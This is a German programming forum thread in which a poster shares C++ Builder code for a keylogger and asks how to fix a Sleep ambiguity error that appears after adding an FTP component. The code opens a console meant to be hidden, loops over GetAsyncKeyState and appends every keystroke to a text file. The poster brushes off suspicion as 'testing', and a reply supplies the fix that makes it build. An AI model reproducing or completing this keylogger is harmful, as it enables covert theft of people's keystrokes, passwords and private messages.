Mehrdeutigkeits fehler



  • [C++ Fehler] Unit1.cpp(58): E2015 Mehrdeutigkeit zwischen '_fastcall Idglobal::Sleep(unsigned int)' und '__stdcall Sleep(unsigned long)'

    Ich habe folgenden Source Code

    //---------------------------------------------------------------------------
    
    #include <vcl.h>
    #include <windows>
    #include <stdio>
    #pragma hdrstop
    
    #include "Unit1.h"
    //---------------------------------------------------------------------------
    #pragma package(smart_init)
    #pragma resource "*.dfm"
    TForm1 *Form1;
    //---------------------------------------------------------------------------
    __fastcall TForm1::TForm1(TComponent* Owner)
            : TForm(Owner)
    {
    }
    //---------------------------------------------------------------------------
    
    void __fastcall TForm1::Button1Click(TObject *Sender)
    {
    AllocConsole();
    ShowWindow(FindWindowA("ConsoleWindowClass",NULL),1); // Das öffnet eine neue Konsole, und versteckt diese auch sofort wenn man die 0 am ende durch eine 1 ersetzt wird die Konsole angezeigt
    
    FILE *Log;
    short key;
    char szKey[MAX_PATH];
    int scan;
    
    while(1)
    {
      Sleep(10);
      for(key=0;key<256;key++)
     {
    
        if(GetAsyncKeyState(key)==-32767)
        {
           scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0));
           GetKeyNameText(scan << 16,szKey,MAX_PATH);
           Log=fopen ("i:\\testdatei.txt","a+"); // +a der datei weiteren text hinzufügen
           fprintf(Log,"%s-",szKey); //fprintf in einen stream schreiben
           fclose(Log);
        }
      }
    }
    
    }
    //---------------------------------------------------------------------------
    

    und die oben gennante Fehlermeldung tritt immer nur dann auf wenn ich auf meine Form die IdFTP1 Komponete setze.

    Gibt es da vielleicht zu Sleep eine alternative ?

    Das ganze dient nur zu test zwecken falls wer da was böses denkt ...



  • Na welches Sleep willste denn nun verwenden?

    Probier

    Idglobal::Sleep(10);
    

    oder vielleicht

    ::Sleep(10);
    

    ?



  • Ty deine Frage war die Lösung auf meine Frage^^ 🙂


Log in to reply